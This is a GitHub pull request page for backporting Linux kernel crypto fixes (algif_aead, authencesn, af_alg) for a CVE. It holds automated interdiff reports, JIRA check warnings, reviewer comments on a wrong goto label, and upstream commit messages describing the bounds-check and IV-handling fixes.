 	u32 tmp[2];
-
 	if (!authsize)
 		goto decrypt;
 
@@ -296,11 +254,8 @@
 
 	cryptlen -= authsize;
 
-	if (req->src != dst) {
-		err = crypto_authenc_esn_copy(req, assoclen + cryptlen);
-		if (err)
-			return err;
-	}
+	if (req->src != dst)
+		memcpy_sglist(dst, req->src, assoclen + cryptlen);
 
 	scatterwalk_map_and_copy(ihash, req->src, assoclen + cryptlen,
 				 authsize, 0);
  • ⚠️ PR commit 3e104a40e279 (crypto: algif_aead - snapshot IV for async AEAD requests) → upstream 5aa58c3a572b
    Differences found:
================================================================================
*    DELTA DIFFERENCES - code changes that differ between the patches          *
================================================================================

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -224,7 +224,7 @@
 
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
-			       areq->first_rsgl.sgl.sg, used, iv);
+			       areq->first_rsgl.sgl.sg, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);
 

################################################################################
!    REJECTED PATCH2 HUNKS - could not be compared; manual review needed       !
################################################################################

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -193,7 +199,7 @@
 
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
-			       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
+			       areq->first_rsgl.sgl.sgt.sgl, used, iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);
 

================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -69,5 +69,5 @@
-	struct crypto_aead *tfm = aeadc->aead;
-	struct crypto_skcipher *null_tfm = aeadc->null_tfm;
+	struct af_alg_ctx *ctx = ask->private;
+	struct crypto_aead *tfm = pask->private;
 	unsigned int as = crypto_aead_authsize(tfm);
 	struct af_alg_async_req *areq;
 	struct scatterlist *rsgl_src, *tsgl_src = NULL;
@@ -212,7 +184,7 @@
 
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
-			       areq->first_rsgl.sgl.sg, used, ctx->iv);
+			       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);

This is an automated interdiff check for backported commits.

@github-actions

github-actions Bot commented May 1, 2026

Copy link
Copy Markdown

JIRA PR Check Results

7 commit(s) with issues found:

Commit 3e104a40e279

Summary: crypto: algif_aead - snapshot IV for async AEAD requests

⚠️ Warnings:

  • VULN-181877: No time logged - please log time manually

Commit c5483a5dfa6b

Summary: crypto: algif_aead - Fix minimum RX size check for decryption

⚠️ Warnings:

  • VULN-181877: No time logged - please log time manually

Commit d37f76445ea0

Summary: crypto: authencesn - reject short ahash digests during instance creation

⚠️ Warnings:

  • VULN-181877: No time logged - please log time manually

Commit f50e3313629b

Summary: crypto: authencesn - Fix src offset when decrypting in-place

⚠️ Warnings:

  • VULN-181877: No time logged - please log time manually

Commit 18b86ddf564d

Summary: crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption

⚠️ Warnings:

  • VULN-181877: No time logged - please log time manually

Commit c476c6e98ec6

Summary: crypto: algif_aead - Revert to operating out-of-place

⚠️ Warnings:

  • VULN-181877: No time logged - please log time manually

Commit 6f82c321961b

Summary: crypto: af-alg - fix NULL pointer dereference in scatterwalk

⚠️ Warnings:

  • VULN-181877: No time logged - please log time manually

Summary: Checked 10 commit(s) total.

@github-actions

github-actions Bot commented May 1, 2026

Copy link
Copy Markdown

Validation checks completed successfully View full results: https://github.com/ctrliq/kernel-src-tree/actions/runs/25228484514

Comment thread crypto/authencesn.c Outdated

if (auth->digestsize > 0 && auth->digestsize < 4) {
err = -EINVAL;
goto err_free_inst;

Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I gave you the diff for a reason 😛

This goto is wrong. It should be out_put_auth

Copy link
Copy Markdown
Collaborator Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

🤷 looked like a move when i was glancing at it.

(.venv) [jmaple@devbox kernel-src-tree]$ git diff
diff --git a/crypto/authencesn.c b/crypto/authencesn.c
index fd11444f1971..7349efeb767b 100644
--- a/crypto/authencesn.c
+++ b/crypto/authencesn.c
@@ -461,7 +461,7 @@ static int crypto_authenc_esn_create(struct crypto_template *tmpl,

        if (auth->digestsize > 0 && auth->digestsize < 4) {
                err = -EINVAL;
-               goto err_free_inst;
+               goto out_put_auth;
        }

        enc_name = crypto_attr_alg_name(tb[2]);

Herbert Xu and others added 3 commits May 1, 2026 15:10
jira VULN-181877
cve-bf CVE-2026-31431
commit-author Yucheng Lu <kanolyc@gmail.com>
commit -
commit-source-sha 5db6ef9
commit-source centos-stream-9, cryptodev
upstream-diff |
	Diff got placed oddly but was contextual differences.

authencesn requires either a zero authsize or an authsize of at least
4 bytes because the ESN encrypt/decrypt paths always move 4 bytes of
high-order sequence number data at the end of the authenticated data.

While crypto_authenc_esn_setauthsize() already rejects explicit
non-zero authsizes in the range 1..3, crypto_authenc_esn_create()
still copied auth->digestsize into inst->alg.maxauthsize without
validating it.  The AEAD core then initialized the tfm's default
authsize from that value.

As a result, selecting an ahash with digest size 1..3, such as
cbcmac(cipher_null), exposed authencesn instances whose default
authsize was invalid even though setauthsize() would have rejected the
same value.  AF_ALG could then trigger the ESN tail handling with a
too-short tag and hit an out-of-bounds access.

Reject authencesn instances whose ahash digest size is in the invalid
non-zero range 1..3 so that no tfm can inherit an unsupported default
authsize.

Fixes: f15f05b ("crypto: ccm - switch to separate cbcmac driver")
    Cc: stable@kernel.org
    Reported-by: Yifan Wu <yifanwucs@gmail.com>
    Reported-by: Juefei Pu <tomapufckgml@gmail.com>
    Co-developed-by: Yuan Tan <yuantan098@gmail.com>
    Signed-off-by: Yuan Tan <yuantan098@gmail.com>
    Suggested-by: Xin Liu <bird@lzu.edu.cn>
    Tested-by: Yuhang Zheng <z1652074432@gmail.com>
    Reviewed-by: Eric Biggers <ebiggers@kernel.org>
    Signed-off-by: Yucheng Lu <kanolyc@gmail.com>
    Signed-off-by: Ren Wei <n05ec@lzu.edu.cn>
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
jira VULN-181877
cve-bf CVE-2026-31431
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit 3d14bd4

The check for the minimum receive buffer size did not take the
tag size into account during decryption.  Fix this by adding the
required extra length.

	Reported-by: syzbot+aa11561819dc42ebbc7c@syzkaller.appspotmail.com
	Reported-by: Daniel Pouzzner <douzzer@mega.nu>
Fixes: d887c52 ("crypto: algif_aead - overhaul memory management")
	Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
(cherry picked from commit 3d14bd4)
	Signed-off-by: Jonathan Maple <jmaple@ciq.com>
jira VULN-181877
cve-bf CVE-2026-31431
commit-author Douya Le <ldy3087146292@gmail.com>
commit 5aa58c3

AF_ALG AEAD AIO requests currently use the socket-wide IV buffer during
request processing.  For async requests, later socket activity can
update that shared state before the original request has fully
completed, which can lead to inconsistent IV handling.

Snapshot the IV into per-request storage when preparing the AEAD
request, so in-flight operations no longer depend on mutable socket
state.

Fixes: d887c52 ("crypto: algif_aead - overhaul memory management")
    Cc: stable@kernel.org
    Reported-by: Yuan Tan <yuantan098@gmail.com>
    Reported-by: Yifan Wu <yifanwucs@gmail.com>
    Reported-by: Juefei Pu <tomapufckgml@gmail.com>
    Reported-by: Xin Liu <bird@lzu.edu.cn>
    Co-developed-by: Luxing Yin <tr0jan@lzu.edu.cn>
    Signed-off-by: Luxing Yin <tr0jan@lzu.edu.cn>
    Tested-by: Yucheng Lu <kanolyc@gmail.com>
    Signed-off-by: Douya Le <ldy3087146292@gmail.com>
    Signed-off-by: Ren Wei <n05ec@lzu.edu.cn>
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
@PlaidCat PlaidCat force-pushed the {jmaple}_ciqlts8_6 branch from 3e104a4 to fa5a377 Compare May 1, 2026 19:12

@kerneltoast kerneltoast left a comment

Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

:shipit:

@bmastbergen bmastbergen self-requested a review May 1, 2026 19:17

@bmastbergen bmastbergen left a comment

Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

🥌

@github-actions

github-actions Bot commented May 1, 2026

Copy link
Copy Markdown

🤖 Validation Checks In Progress Workflow run: https://github.com/ctrliq/kernel-src-tree/actions/runs/25229315769

@github-actions

github-actions Bot commented May 1, 2026

Copy link
Copy Markdown

🔍 Upstream Linux Kernel Commit Check

  • ⚠️ PR commit 6f82c321961b (crypto: af-alg - fix NULL pointer dereference in scatterwalk) does not reference a CVE but
    upstream commit 62397b493e14 is associated with CVE-2026-43043

  • ❌ PR commit 18b86ddf564d (crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption) references CVE-2026-31431 but
    upstream commit e02494114ebf is associated with CVE-2026-43033

This is an automated message from the kernel commit checker workflow.

@github-actions

github-actions Bot commented May 1, 2026

Copy link
Copy Markdown

🔍 Interdiff Analysis

  • ⚠️ PR commit c476c6e98ec6 (crypto: algif_aead - Revert to operating out-of-place) → upstream a664bf3d603d
    Differences found:
================================================================================
*    DELTA DIFFERENCES - code changes that differ between the patches          *
================================================================================

--- b/crypto/af_alg.c
+++ b/crypto/af_alg.c
@@ -526,10 +526,12 @@
 /**
  * aead_count_tsgl - Count number of TX SG entries
  *
- * The counting starts from the beginning of the SGL to @bytes.
+ * The counting starts from the beginning of the SGL to @bytes. If
+ * an offset is provided, the counting of the SG entries starts at the offset.
  *
  * @sk socket of connection to user space
  * @bytes Count the number of SG entries holding given number of bytes.
+ * @offset Start the counting of SG entries from the given offset.
  * @return Number of TX SG entries found given the constraints
  */
 unsigned int af_alg_count_tsgl(struct sock *sk, size_t bytes)
@@ -563,12 +565,16 @@
  * aead_pull_tsgl - Release the specified buffers from TX SGL
  *
  * If @dst is non-null, reassign the pages to dst. The caller must release
- * the pages.
+ * the pages. If @dst_offset is given only reassign the pages to @dst starting
+ * at the @dst_offset (byte). The caller must ensure that @dst is large
+ * enough (e.g. by using af_alg_count_tsgl with the same offset).
  *
  * @sk socket of connection to user space
  * @used Number of bytes to pull from TX SGL
  * @dst If non-NULL, buffer is reassigned to dst SGL instead of releasing. The
  *	caller must release the buffers in dst.
+ * @dst_offset Reassign the TX SGL from given offset. All buffers before
+ *	       reaching the offset is released.
  */
 void af_alg_pull_tsgl(struct sock *sk, size_t used, struct scatterlist *dst)
 {
--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -211,13 +212,72 @@
 	/* Use the RX SGL as source (and destination) for crypto op. */
 	rsgl_src = areq->first_rsgl.sgl.sg;
 
-	err = crypto_aead_copy_sgl(null_tfm, tsgl_src, rsgl_src,
-				   ctx->aead_assoclen);
-	if (err)
-		goto free;
+	if (ctx->enc) {
+		/*
+		 * Encryption operation - The in-place cipher operation is
+		 * achieved by the following operation:
+		 *
+		 * TX SGL: AAD || PT
+		 *	    |	   |
+		 *	    | copy |
+		 *	    v	   v
+		 * RX SGL: AAD || PT || Tag
+		 */
+		err = crypto_aead_copy_sgl(null_tfm, tsgl_src,
+					   areq->first_rsgl.sgl.sg, processed);
+		if (err)
+			goto free;
+		af_alg_pull_tsgl(sk, processed, NULL, 0);
+	} else {
+		/*
+		 * Decryption operation - To achieve an in-place cipher
+		 * operation, the following  SGL structure is used:
+		 *
+		 * TX SGL: AAD || CT || Tag
+		 *	    |	   |	 ^
+		 *	    | copy |	 | Create SGL link.
+		 *	    v	   v	 |
+		 * RX SGL: AAD || CT ----+
+		 */
+
+		 /* Copy AAD || CT to RX SGL buffer for in-place operation. */
+		err = crypto_aead_copy_sgl(null_tfm, tsgl_src,
+					   areq->first_rsgl.sgl.sg, outlen);
+		if (err)
+			goto free;
+
+		/* Create TX SGL for tag and chain it to RX SGL. */
+		areq->tsgl_entries = af_alg_count_tsgl(sk, processed,
+						       processed - as);
+		if (!areq->tsgl_entries)
+			areq->tsgl_entries = 1;
+		areq->tsgl = sock_kmalloc(sk, array_size(sizeof(*areq->tsgl),
+							 areq->tsgl_entries),
+					  GFP_KERNEL);
+		if (!areq->tsgl) {
+			err = -ENOMEM;
+			goto free;
+		}
+		sg_init_table(areq->tsgl, areq->tsgl_entries);
+
+		/* Release TX SGL, except for tag data and reassign tag data. */
+		af_alg_pull_tsgl(sk, processed, areq->tsgl, processed - as);
+
+		/* chain the areq TX SGL holding the tag with RX SGL */
+		if (usedpages) {
+			/* RX SGL present */
+			struct af_alg_sgl *sgl_prev = &areq->last_rsgl->sgl;
+
+			sg_unmark_end(sgl_prev->sg + sgl_prev->npages - 1);
+			sg_chain(sgl_prev->sg, sgl_prev->npages + 1,
+				 areq->tsgl);
+		} else
+			/* no RX SGL present (e.g. authentication only) */
+			rsgl_src = areq->tsgl;
+	}
 
 	/* Initialize the crypto operation */
-	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
+	aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
 			       areq->first_rsgl.sgl.sg, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);

################################################################################
!    REJECTED PATCH2 HUNKS - could not be compared; manual review needed       !
################################################################################

--- b/crypto/af_alg.c
+++ b/crypto/af_alg.c
@@ -637,8 +637,7 @@
 /**
  * af_alg_count_tsgl - Count number of TX SG entries
  *
- * The counting starts from the beginning of the SGL to @bytes. If
- * an @offset is provided, the counting of the SG entries starts at the @offset.
+ * The counting starts from the beginning of the SGL to @bytes.
  *
  * @sk: socket of connection to user space
  * @bytes: Count the number of SG entries holding given number of bytes.
@@ -642,7 +641,6 @@
  *
  * @sk: socket of connection to user space
  * @bytes: Count the number of SG entries holding given number of bytes.
- * @offset: Start the counting of SG entries from the given offset.
  * Return: Number of TX SG entries found given the constraints
  */
 unsigned int af_alg_count_tsgl(struct sock *sk, size_t bytes, size_t offset)
@@ -676,9 +660,7 @@
  * af_alg_pull_tsgl - Release the specified buffers from TX SGL
  *
  * If @dst is non-null, reassign the pages to @dst. The caller must release
- * the pages. If @dst_offset is given only reassign the pages to @dst starting
- * at the @dst_offset (byte). The caller must ensure that @dst is large
- * enough (e.g. by using af_alg_count_tsgl with the same offset).
+ * the pages.
  *
  * @sk: socket of connection to user space
  * @used: Number of bytes to pull from TX SGL
@@ -682,8 +664,6 @@
  * @used: Number of bytes to pull from TX SGL
  * @dst: If non-NULL, buffer is reassigned to dst SGL instead of releasing. The
  *	 caller must release the buffers in dst.
- * @dst_offset: Reassign the TX SGL from given offset. All buffers before
- *	        reaching the offset is released.
  */
 void af_alg_pull_tsgl(struct sock *sk, size_t used, struct scatterlist *dst,
 		      size_t dst_offset)
--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -26,7 +26,6 @@
 #include <crypto/internal/aead.h>
 #include <crypto/scatterwalk.h>
 #include <crypto/if_alg.h>
-#include <crypto/skcipher.h>
 #include <linux/init.h>
 #include <linux/list.h>
 #include <linux/kernel.h>
@@ -72,7 +71,7 @@
 	struct alg_sock *pask = alg_sk(psk);
 	struct af_alg_ctx *ctx = ask->private;
 	struct crypto_aead *tfm = pask->private;
-	unsigned int i, as = crypto_aead_authsize(tfm);
+	unsigned int as = crypto_aead_authsize(tfm);
 	struct af_alg_async_req *areq;
 	struct af_alg_tsgl *tsgl, *tmp;
 	struct scatterlist *rsgl_src, *tsgl_src = NULL;
@@ -182,64 +177,7 @@
 	/* Use the RX SGL as source (and destination) for crypto op. */
 	rsgl_src = areq->first_rsgl.sgl.sgt.sgl;
 
-	if (ctx->enc) {
-		/*
-		 * Encryption operation - The in-place cipher operation is
-		 * achieved by the following operation:
-		 *
-		 * TX SGL: AAD || PT
-		 *	    |	   |
-		 *	    | copy |
-		 *	    v	   v
-		 * RX SGL: AAD || PT || Tag
-		 */
-		memcpy_sglist(areq->first_rsgl.sgl.sgt.sgl, tsgl_src,
-			      processed);
-		af_alg_pull_tsgl(sk, processed, NULL, 0);
-	} else {
-		/*
-		 * Decryption operation - To achieve an in-place cipher
-		 * operation, the following  SGL structure is used:
-		 *
-		 * TX SGL: AAD || CT || Tag
-		 *	    |	   |	 ^
-		 *	    | copy |	 | Create SGL link.
-		 *	    v	   v	 |
-		 * RX SGL: AAD || CT ----+
-		 */
-
-		/* Copy AAD || CT to RX SGL buffer for in-place operation. */
-		memcpy_sglist(areq->first_rsgl.sgl.sgt.sgl, tsgl_src, outlen);
-
-		/* Create TX SGL for tag and chain it to RX SGL. */
-		areq->tsgl_entries = af_alg_count_tsgl(sk, processed,
-						       processed - as);
-		if (!areq->tsgl_entries)
-			areq->tsgl_entries = 1;
-		areq->tsgl = sock_kmalloc(sk, array_size(sizeof(*areq->tsgl),
-							 areq->tsgl_entries),
-					  GFP_KERNEL);
-		if (!areq->tsgl) {
-			err = -ENOMEM;
-			goto free;
-		}
-		sg_init_table(areq->tsgl, areq->tsgl_entries);
-
-		/* Release TX SGL, except for tag data and reassign tag data. */
-		af_alg_pull_tsgl(sk, processed, areq->tsgl, processed - as);
-
-		/* chain the areq TX SGL holding the tag with RX SGL */
-		if (usedpages) {
-			/* RX SGL present */
-			struct af_alg_sgl *sgl_prev = &areq->last_rsgl->sgl;
-			struct scatterlist *sg = sgl_prev->sgt.sgl;
-
-			sg_unmark_end(sg + sgl_prev->sgt.nents - 1);
-			sg_chain(sg, sgl_prev->sgt.nents + 1, areq->tsgl);
-		} else
-			/* no RX SGL present (e.g. authentication only) */
-			rsgl_src = areq->tsgl;
-	}
+	memcpy_sglist(rsgl_src, tsgl_src, ctx->aead_assoclen);
 
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
@@ -242,7 +180,7 @@
 	}
 
 	/* Initialize the crypto operation */
-	aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
+	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
 			       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);
--- b/include/crypto/if_alg.h
+++ b/include/crypto/if_alg.h
@@ -230,9 +230,8 @@
 	return PAGE_SIZE <= af_alg_rcvbuf(sk);
 }
 
-unsigned int af_alg_count_tsgl(struct sock *sk, size_t bytes, size_t offset);
-void af_alg_pull_tsgl(struct sock *sk, size_t used, struct scatterlist *dst,
-		      size_t dst_offset);
+unsigned int af_alg_count_tsgl(struct sock *sk, size_t bytes);
+void af_alg_pull_tsgl(struct sock *sk, size_t used, struct scatterlist *dst);
 void af_alg_wmem_wakeup(struct sock *sk);
 int af_alg_wait_for_data(struct sock *sk, unsigned flags, unsigned min);
 int af_alg_sendmsg(struct socket *sock, struct msghdr *msg, size_t size,

================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/af_alg.c
+++ b/crypto/af_alg.c
@@ -523,15 +523,15 @@
 /**
- * aead_count_tsgl - Count number of TX SG entries
+ * af_alg_count_tsgl - Count number of TX SG entries
  *
  * The counting starts from the beginning of the SGL to @bytes. If
- * an offset is provided, the counting of the SG entries starts at the offset.
+ * an @offset is provided, the counting of the SG entries starts at the @offset.
  *
- * @sk socket of connection to user space
- * @bytes Count the number of SG entries holding given number of bytes.
- * @offset Start the counting of SG entries from the given offset.
- * @return Number of TX SG entries found given the constraints
+ * @sk: socket of connection to user space
+ * @bytes: Count the number of SG entries holding given number of bytes.
+ * @offset: Start the counting of SG entries from the given offset.
+ * Return: Number of TX SG entries found given the constraints
  */
 unsigned int af_alg_count_tsgl(struct sock *sk, size_t bytes, size_t offset)
 {
-	struct alg_sock *ask = alg_sk(sk);
-	struct af_alg_ctx *ctx = ask->private;
+	const struct alg_sock *ask = alg_sk(sk);
+	const struct af_alg_ctx *ctx = ask->private;
@@ -546,4 +657,4 @@
-		struct scatterlist *sg = sgl->sg;
+		const struct scatterlist *sg = sgl->sg;
 
 		for (i = 0; i < sgl->cur; i++) {
 			size_t bytes_count;
@@ -571,16 +682,16 @@
- * aead_pull_tsgl - Release the specified buffers from TX SGL
+ * af_alg_pull_tsgl - Release the specified buffers from TX SGL
  *
- * If @dst is non-null, reassign the pages to dst. The caller must release
+ * If @dst is non-null, reassign the pages to @dst. The caller must release
  * the pages. If @dst_offset is given only reassign the pages to @dst starting
  * at the @dst_offset (byte). The caller must ensure that @dst is large
  * enough (e.g. by using af_alg_count_tsgl with the same offset).
  *
- * @sk socket of connection to user space
- * @used Number of bytes to pull from TX SGL
- * @dst If non-NULL, buffer is reassigned to dst SGL instead of releasing. The
- *	caller must release the buffers in dst.
- * @dst_offset Reassign the TX SGL from given offset. All buffers before
- *	       reaching the offset is released.
+ * @sk: socket of connection to user space
+ * @used: Number of bytes to pull from TX SGL
+ * @dst: If non-NULL, buffer is reassigned to dst SGL instead of releasing. The
+ *	 caller must release the buffers in dst.
+ * @dst_offset: Reassign the TX SGL from given offset. All buffers before
+ *	        reaching the offset is released.
  */
 void af_alg_pull_tsgl(struct sock *sk, size_t used, struct scatterlist *dst,
 		      size_t dst_offset)
--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -25,5 +25,4 @@
 #include <crypto/if_alg.h>
 #include <crypto/skcipher.h>
-#include <crypto/null.h>
 #include <linux/init.h>
 #include <linux/list.h>
@@ -73,6 +69,6 @@
-	struct aead_tfm *aeadc = pask->private;
-	struct crypto_aead *tfm = aeadc->aead;
-	struct crypto_skcipher *null_tfm = aeadc->null_tfm;
+	struct alg_sock *pask = alg_sk(psk);
+	struct af_alg_ctx *ctx = ask->private;
+	struct crypto_aead *tfm = pask->private;
 	unsigned int i, as = crypto_aead_authsize(tfm);
 	struct af_alg_async_req *areq;
 	struct af_alg_tsgl *tsgl, *tmp;
@@ -214,7 +184,7 @@
 	 */
 
 	/* Use the RX SGL as source (and destination) for crypto op. */
-	rsgl_src = areq->first_rsgl.sgl.sg;
+	rsgl_src = areq->first_rsgl.sgl.sgt.sgl;
 
 	if (ctx->enc) {
 		/*
@@ -227,10 +197,8 @@
 		 *	    v	   v
 		 * RX SGL: AAD || PT || Tag
 		 */
-		err = crypto_aead_copy_sgl(null_tfm, tsgl_src,
-					   areq->first_rsgl.sgl.sg, processed);
-		if (err)
-			goto free;
+		memcpy_sglist(areq->first_rsgl.sgl.sgt.sgl, tsgl_src,
+			      processed);
 		af_alg_pull_tsgl(sk, processed, NULL, 0);
 	} else {
 		/*
@@ -244,11 +212,8 @@
 		 * RX SGL: AAD || CT ----+
 		 */
 
-		 /* Copy AAD || CT to RX SGL buffer for in-place operation. */
-		err = crypto_aead_copy_sgl(null_tfm, tsgl_src,
-					   areq->first_rsgl.sgl.sg, outlen);
-		if (err)
-			goto free;
+		/* Copy AAD || CT to RX SGL buffer for in-place operation. */
+		memcpy_sglist(areq->first_rsgl.sgl.sgt.sgl, tsgl_src, outlen);
 
 		/* Create TX SGL for tag and chain it to RX SGL. */
 		areq->tsgl_entries = af_alg_count_tsgl(sk, processed,
@@ -271,10 +236,10 @@
 		if (usedpages) {
 			/* RX SGL present */
 			struct af_alg_sgl *sgl_prev = &areq->last_rsgl->sgl;
+			struct scatterlist *sg = sgl_prev->sgt.sgl;
 
-			sg_unmark_end(sgl_prev->sg + sgl_prev->npages - 1);
-			sg_chain(sgl_prev->sg, sgl_prev->npages + 1,
-				 areq->tsgl);
+			sg_unmark_end(sg + sgl_prev->sgt.nents - 1);
+			sg_chain(sg, sgl_prev->sgt.nents + 1, areq->tsgl);
 		} else
 			/* no RX SGL present (e.g. authentication only) */
 			rsgl_src = areq->tsgl;
@@ -283,5 +248,5 @@
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
-			       areq->first_rsgl.sgl.sg, used, ctx->iv);
+			       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);
@@ -482,4 +447,4 @@
-	struct crypto_aead *tfm = aeadc->aead;
+	struct crypto_aead *tfm = pask->private;
 	unsigned int ivlen = crypto_aead_ivsize(tfm);
 
 	af_alg_pull_tsgl(sk, ctx->used, NULL, 0);
--- b/crypto/algif_skcipher.c
+++ b/crypto/algif_skcipher.c
@@ -319,7 +360,7 @@
 	struct alg_sock *pask = alg_sk(psk);
 	struct crypto_skcipher *tfm = pask->private;
 
 	af_alg_pull_tsgl(sk, ctx->used, NULL, 0);
 	sock_kzfree_s(sk, ctx->iv, crypto_skcipher_ivsize(tfm));
-	sock_kfree_s(sk, ctx, ctx->len);
-	af_alg_release_parent(sk);
+	if (ctx->state)
+		sock_kzfree_s(sk, ctx->state, crypto_skcipher_statesize(tfm));
--- b/include/crypto/if_alg.h
+++ b/include/crypto/if_alg.h
@@ -228,8 +229,5 @@
 
-int af_alg_alloc_tsgl(struct sock *sk);
 unsigned int af_alg_count_tsgl(struct sock *sk, size_t bytes, size_t offset);
 void af_alg_pull_tsgl(struct sock *sk, size_t used, struct scatterlist *dst,
 		      size_t dst_offset);
-void af_alg_free_areq_sgls(struct af_alg_async_req *areq);
-int af_alg_wait_for_wmem(struct sock *sk, unsigned int flags);
 void af_alg_wmem_wakeup(struct sock *sk);
  • ⚠️ PR commit 547910e4c6ed (crypto: af_alg - limit RX SG extraction by receive buffer budget) → upstream 8eceab19eba9
    Differences found:
================================================================================
*    DELTA DIFFERENCES - code changes that differ between the patches          *
================================================================================

--- b/crypto/algif_skcipher.c
+++ b/crypto/algif_skcipher.c
@@ -90,14 +90,8 @@
 	 * If more buffers are to be expected to be processed, process only
 	 * full block size buffers.
 	 */
-	if (ctx->more || len < ctx->used) {
-		if (len < bs) {
-			err = -EINVAL;
-			goto free;
-		}
-
+	if (ctx->more || len < ctx->used)
 		len -= len % bs;
-	}
 
 	/*
 	 * Create a per request TX SGL for this request which tracks the

################################################################################
!    REJECTED PATCH2 HUNKS - could not be compared; manual review needed       !
################################################################################

--- b/crypto/algif_skcipher.c
+++ b/crypto/algif_skcipher.c
@@ -130,6 +130,11 @@
 	 * full block size buffers.
 	 */
 	if (ctx->more || len < ctx->used) {
+		if (len < bs) {
+			err = -EINVAL;
+			goto free;
+		}
+
 		len -= len % bs;
 		cflags |= CRYPTO_SKCIPHER_REQ_NOTFINAL;
 	}

================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/algif_skcipher.c
+++ b/crypto/algif_skcipher.c
@@ -87,7 +87,6 @@
 	 * full block size buffers.
 	 */
-	if (ctx->more || len < ctx->used)
+	if (ctx->more || len < ctx->used) {
 		len -= len % bs;
-
-	/*
-	 * Create a per request TX SGL for this request which tracks the
+		cflags |= CRYPTO_SKCIPHER_REQ_NOTFINAL;
+	}
  • ⚠️ PR commit 15531398a6d3 (crypto: authencesn - reject too-short AAD (assoclen<8) to match ESP/ESN spec) → upstream 2397e9264676
    Differences found:
================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/authencesn.c
+++ b/crypto/authencesn.c
@@ -290,6 +253,6 @@
 	u32 tmp[2];
 	int err;
 
 	cryptlen -= authsize;
 
-	if (req->src != dst) {
+	if (req->src != dst)
  • ⚠️ PR commit 18b86ddf564d (crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption) → upstream e02494114ebf
    Differences found:
================================================================================
*    DELTA DIFFERENCES - code changes that differ between the patches          *
================================================================================

--- b/crypto/authencesn.c
+++ b/crypto/authencesn.c
@@ -179,10 +179,7 @@
 	authenc_esn_request_complete(areq, err);
 }
 
-static int crypto_authenc_esn_copy_sg(struct aead_request *req,
-				      struct scatterlist *src,
-				      struct scatterlist *dst,
-				      unsigned int len)
+static int crypto_authenc_esn_copy(struct aead_request *req, unsigned int len)
 {
 	struct crypto_aead *authenc_esn = crypto_aead_reqtfm(req);
 	struct crypto_authenc_esn_ctx *ctx = crypto_aead_ctx(authenc_esn);
@@ -191,16 +188,11 @@
 	skcipher_request_set_tfm(skreq, ctx->null);
 	skcipher_request_set_callback(skreq, aead_request_flags(req),
 				      NULL, NULL);
-	skcipher_request_set_crypt(skreq, src, dst, len, NULL);
+	skcipher_request_set_crypt(skreq, req->src, req->dst, len, NULL);
 
 	return crypto_skcipher_encrypt(skreq);
 }
 
-static int crypto_authenc_esn_copy(struct aead_request *req, unsigned int len)
-{
-	return crypto_authenc_esn_copy_sg(req, req->src, req->dst, len);
-}
-
 static int crypto_authenc_esn_encrypt(struct aead_request *req)
 {
 	struct crypto_aead *authenc_esn = crypto_aead_reqtfm(req);
@@ -260,7 +252,6 @@
 	struct scatterlist *dst = req->dst;
 	u8 *ihash = ohash + crypto_ahash_digestsize(auth);
 	u32 tmp[2];
-	int err;
 
 	if (!authsize)
 		goto decrypt;
@@ -270,11 +261,8 @@
 		scatterwalk_map_and_copy(tmp, dst, 4, 4, 0);
 		scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 0);
